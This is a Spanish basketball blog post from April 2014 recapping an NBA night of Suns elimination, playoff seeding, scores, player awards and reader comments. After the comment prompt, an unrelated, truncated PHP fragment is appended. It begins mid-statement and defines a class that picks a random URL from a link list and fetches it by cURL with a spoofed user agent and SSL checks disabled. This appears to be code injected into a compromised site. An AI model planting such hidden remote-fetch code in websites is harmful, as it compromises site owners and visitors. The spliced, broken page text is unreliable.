La crónica: Se acabó el sueño de la cenicienta.

15 de April de 2014 por Simon

Hasta el penúltimo partido han aguantado estos Phoenix Suns que nos han tenido enamorados a la vez que extrañados toda la temporada. Un equipo concebido para quedar último de conferencia, algo de lo que pocos dudábamos al inicio de campaña, ha estado peleando hasta el final con los grandes equipos de la liga por méritos propios. Ayer tenían una final ante los Grizzlies y estos supieron hacer valer su experiencia al igual que hizo Dallas hace unos días. Los de Hornacek salieron al partido muy nerviosos y fruto de ellos los Grizzlies lograron las primeras ventajas de manera rápida, sólo al final del primer tiempo los Suns fueron capaces de encontrar el camino para desarrollar su juego rápido y colectivo, lo que le llevó a recortar distancias rápidamente. La segunda parte fue sin duda uno de los momentos de la temporada. Pronto en el tercer cuarto, los Suns se metieron de lleno en el partido y la sucesión de cambios de líderes y el choque de estilos fue precioso, uno de los momentos que se recordarán de esta regular season a punto de terminar. A falta de un minuto, cuando le tocaba a Phoenix ponerse por delante Dragic perdió la bola y el contraataque fue culminado por Zach Randolph, magnífico toda la noche, lo que fue el golpe definitivo para los locales que ya no pudieron reaccionar (97-91). Esta vez David no pudo colarse entre el elenco de Goliats que es este año el Oeste, aún así tremenda temporada la de este equipo por el que nadie daba un duro y han peleado hasta el último día.

Se esperaba que la jornada definiera muchas posiciones en el día de ayer y así fue aunque la mayoría se quedaron por definir y serán las dos jornadas que quedan las que dicten el orden concreto de las eliminatorias. Lo que sí se confirmó anoche es que Indiana Pacers será el cabeza de serie nº1 en las eliminatorias del Este. Anoche Indiana no jugó pero lo hicieron los Heat, que sin Lebron ni Bosh dieron vergüenza, tal y como se esperaba. Los Wizards apenas encontraron rival durante un cuarto, en el segundo los Heat desaparecieron de la cancha y los Wizards jugaron a placer el resto del encuentro en el que pudieron dar descanso a sus jugadores habituales (93-114). Con esta victoria los Wizards podían haberse asegurado no ser séptimos si los Bobcats no hubieran protagonizado una de las mayores remontadas de la temporada en el último cuarto. Quince fueron los puntos de desventaja que salvaron y fue Douglas Roberts el héroe inesperado al anotar la canasta definitiva sobre la bocina que permite a los Bobcats seguir peleando por el sexto puesto de conferencia y evitar a los Heat, para su rival el partido de ayer era intrascendente, pase lo que pase los Hawks serán octavos (95-93). Complicado pronosticar como quedarán ordenados estos equipos en el Este pues puede bailar cualquier posición entre el quinto y el séptimo.

Tampoco quedó definida la tercera plaza del Este. Ni Raptors ni Bulls fallaron en sus encuentros, más bien trámites, y emplazan a la última jornada la resolución de esta lucha. Los Raptors tuvieron cero problemas con los Bucks  a lo que prácticamente con el primer cuarto ya lograron derrotar pues Milwaukee nunca fue capaz de pasar la barrera de los 10 puntos (100-110). Un poco más de resistencia tuvieron los Bulls ante los Magic. A pesar de que Chicago logró distanciarse en el marcador desde muy pronto, un gran tercer cuarto de Orlando a punto estuvo de igualar el partido pero los Bulls reaccionaron y en apenas un par de minutos mandaron a los Magic por detrás de la barrera psicológica que suponen los 10 puntos (95-108).

También se decidieron cosas en el Oeste ayer. Los Rockets vencieron en casa a los Spurs y se aseguraron ser cuartos de conferencia y tener ventaja de campo ante Portland Trail Blazers. Hasta los últimos minutos tuvieron que esperar los Rockets para poder asegurarse la victoria ante unos Spurs, que a pesar de jugar relajados y sin demasiada intensidad les dio para pelear la victoria hasta los últimos dos minutos (98-104). Otros que aseguraron su sexto puesto fueron los Warriors, que lograron remontar 14 puntos de desventaja tras el primer cuarto a los Wolves que lucharán en la última jornada por alcanzar el 50% de balance (120-130). Además Golden State Warriors dio a conocer ayer que Bogut tiene una costilla rota por lo que probablemente ha terminado la temporada para él.

En el resto de partidos de la jornada, Oklahoma no certificó su segundo puesto de conferencia y tendrá que esperar a la última jornada para asegurarlo. Ayer se encontraron con Tyreke Evans a un nivel espectacular que no les dio opciones con sus 41 puntos en el partido de los cuales 17 fueron en el último cuarto con todo por jugar (89-101). Los Sixers se despidieron de su afición con victoria ante los Celtics con un gran MCW, que va a ser ROY indiscutido, en un partido extraño con muchas rachas de ambos equipos (108-113). Los Lakers vencieron en Salt Lake City con un gran último cuarto y con Young anotando 41 puntos y se aseguran no ser el peor equipo del Oeste esta temporada (119-104).

PREMIOS

MVP: Tyreke Evans, rozando el triple doble con esos 41 puntos, 9 rebotes, 8 asistencias y ajusticiando a los Thunder en el último cuarto. Stephen Curry también estuvo en plan artista con los Warriors. Festival de 15 asistencias, además de sus 32 puntos y 5 rebotes.

Rookie: Por si no quedaba bastante claro el rookie del año se dió un homenaje ante un rival de solera como los Celtics. Michael Carter-Williams estuvo en plan hombre orquesta, anotando 21 puntos, capturando 14 rebotes, 6 asistencias, 4 robos, 2 tapones… En frente Olynyck también cuajó una de sus mejores actuaciones del año con 28 puntos, 9 rebotes y 3 asistencias.

Sorpresa: Partidazo de Greivis Vasquez batiendo el récord de victorias de los Raptors. Sustituyó a la perfección a DeRozan en el plano anotador con 25 puntos y repartió 7 asistencias. Probablemente éste debería haber sido su nivel durante todo el curso. La canasta ganadora de Chris Douglas-Roberts (sí, sigue vivo) también tiene tela.

Decepción: Tiene nombre colectivo. Son los Phoenix Suns. El baloncesto, como la vida, a veces es injusto. Todos no cabían en estos playoffs.

Esfuerzo en vano: Así a ojo seguramente se va a volver a llevar el premio global este curso. Kevin Love volvió a estar omnipresente con 41-14-9… pero volvió a perder. El resumen de la decepcionante campaña de los Wolves.

Comenta

5 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Para mi los Suns hubieran sido el mayor esfuerzo en vano, no la decepción… decepción es quedarse fuera, pero los Suns este año no han sido decepción, en todo caso sorpresa

      Citar

  2. jmpa398 dice:
    #2

    Aunque sólo sea por lo que han luchado y porque no han tankeado descaradamente como otros, merecerían llevarse el nº 1 del draft. Ya se que las posibilidades de que eso suceda son mínimas, pero en fin…

    Grandes Suns ¡¡¡

      Citar

  3. Ruxixon dice:
    #3

    Sea como fuere ahí queda su esfuerzo durante toda la temporada,espero que al menos les haya valido para que ganarse nuevos aficionados que les apoyen en el futuro.Una gran historia con un triste final,larga vida a estos Suns.

      Citar

  4. Jose Luis dice:
    #4

    Enhorabuena Ruxixon por el anillo en la Hoops en 2ª 😀

      Citar

  5. Ruxixon dice:
    #5

    Jose Luis:
    Enhorabuena Ruxixon por el anillo en la Hoops en 2ª

    ¡Gracias tio!La justa medida de fortuna y scouting xD A ver el año que viene en primera como vamos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>